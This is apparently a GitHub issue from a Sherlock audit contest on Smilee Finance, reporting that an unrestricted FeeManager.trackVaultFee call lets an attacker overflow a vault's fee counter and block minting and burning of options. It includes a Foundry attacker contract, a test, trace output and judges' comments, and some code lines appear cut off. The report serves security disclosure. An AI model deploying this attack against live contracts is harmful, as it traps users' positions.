sherlock-audit / 2024-02-smilee-finance-judging

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hals - `IG` contract can be DoS'd from minting or burning options #122

Closed sherlock-admin4 closed 8 months ago

sherlock-admin4 commented 9 months ago



IG contract can be DoS'd from minting or burning options


IG contract can be DoS'd from minting or burning options by a malicious actor setting the vaultFeeAmounts[vault] to the maximum amount resulting in reverting transactions due to overflow whenevr FeeManager.trackVaultFee function is called

Vulnerability Detail


but any of these changes will not be immediate as the timeLockDelay must be passed first before applying any new changes, which will result in permanently disabling the IG contracts that use the victim vault.

Code Snippet

FeeManager.trackVaultFee function

   function trackVaultFee(address vault, uint256 feeAmount) external {
        // Check sender:
        IDVP dvp = IDVP(msg.sender);
        if (vault != dvp.vault()) {
            revert WrongVault();

        vaultFeeAmounts[vault] += feeAmount;

        emit TransferVaultFee(vault, feeAmount);

Foundry PoC:

  1. Add this Attacker.sol file in the following directory smilee-v2-contracts/test/ :

    ├── smilee-v2-contracts
    │   ├── test
    │       ├──Attacker.sol
    // SPDX-License-Identifier: UNLICENSED
    pragma solidity ^0.8.15;
    interface IFeeManager {
       function trackVaultFee(address vault, uint256 feeAmount) external;
    contract Attacker {
       // the victim vault
       address public vault;
       function setVictimVault(address victimVault_) public {
           vault = victimVault_;
       function attack(address feeManagerAddress, uint256 maxValue) public {
           IFeeManager(feeManagerAddress).trackVaultFee(vault, maxValue);
  2. Add testDiasableIG test to the IG.t.sol file in the following directory smilee-v2-contracts/test/IG.t.sol (note that this test is copied from testMintAndBurn test and modified to illustrate the vulnerability) :

    function testDiasableIG() public {
           uint256 minFeeBeforeTimeThreshold = 1e5;
           uint256 minFeeAfterTimeThreshold = 1e5;
           bytes memory arithmeticError = abi.encodeWithSignature("Panic(uint256)", 0x11);
           //1. the `FeeManager` admin sets the the DVPFees (to illustrate the vulnerability, as it was set to 0 in the setUp), here the `minFeeBeforeTimeThreshold` & `minFeeAfterTimeThreshold` that are used to calculate vault fees are going to be set to values > 0
           // note that the `timeLockDelay` is set to zero in the setUp, that's whay the DVPFees are immediatly set without waiting the timelock delay to pass
           //2. alice mints a position:
           uint256 inputAmount = 1 ether;
           uint256 currEpoch = ig.currentEpoch();
           uint256 strike = ig.currentStrike();
           TokenUtils.provideApprovedTokens(address(0x10), baseToken, alice, address(ig), inputAmount, vm);
           (uint256 expectedMarketValue, ) = ig.premium(strike, inputAmount, 0);
 , strike, inputAmount, 0, expectedMarketValue, 0.1e18, 0);
           //3. the attacker contract attacks the victim IG:
           uint256 maxVaultFeeToOverFlow = type(uint256).max - minFeeBeforeTimeThreshold;
           Attacker attackerContract = new Attacker();
           attackerContract.attack(ap.feeManager(), maxVaultFeeToOverFlow);
           //4. alice tries to exit her position (burn), but the transaction will revert due to overflow ("Arithmetic over/underflow"):
           (expectedMarketValue, ) = ig.payoff(currEpoch, strike, inputAmount, 0);
           ig.burn(currEpoch, alice, strike, inputAmount, 0, expectedMarketValue, 0.1e18);
  3. Explained scenario:

    1. The FeeManager contract admin sets the minFeeBeforeTimeThreshold & minFeeAfterTimeThreshold for the victim DVP (note that in the test file the timeLockDelay is set to zero, that's why the DVPFees are set immediatly without waiting for the timeLock delay to pass, and this is not the case in real deployment).
    2. Alice mints a position.
    3. An attacker contract is being deployed with vault() being the same used by the victim IG contract, then the attacker contract calls FeeManager.trackVaultFee on the victim vault to increase its fee amount to the maximum value.
    4. Now alice tris to exit her position from the victim IG contract, but the transaction will revert due to arithmetic overflow.
  4. Test result:

    $ forge test --mt testDiasableIG -vvvvv
       │   ├─ [1647] FeeManager::trackVaultFee(MockedVault: [0x1E1eC29a0C2D587fD88e9980858e4cBc7242bB22], 100000 [1e5])
       │   │   ├─ [348] MockedIG::vault() [staticcall]
       │   │   │   └─ ← MockedVault: [0x1E1eC29a0C2D587fD88e9980858e4cBc7242bB22]
       │   │   └─ ← "Arithmetic over/underflow"
       │   └─ ← "Arithmetic over/underflow"
       ├─ [0] VM::stopPrank()
       │   └─ ← ()
       └─ ← ()
    Test result: ok. 1 passed; 0 failed; 0 skipped; finished in 24.99ms
    Ran 1 test suites: 1 tests passed, 0 failed, 0 skipped (1 total tests)

Tool used

Manual Review & Foundry.


Whitelist the IG contracts that are allowed to interact with the FeeManager contract.

Duplicate of #43

sherlock-admin2 commented 8 months ago

2 comment(s) were left on this issue during the judging contest.

panprog commented:

valid high, dup of #43

takarez commented:

valid; medium(4)

metadato-eth commented 8 months ago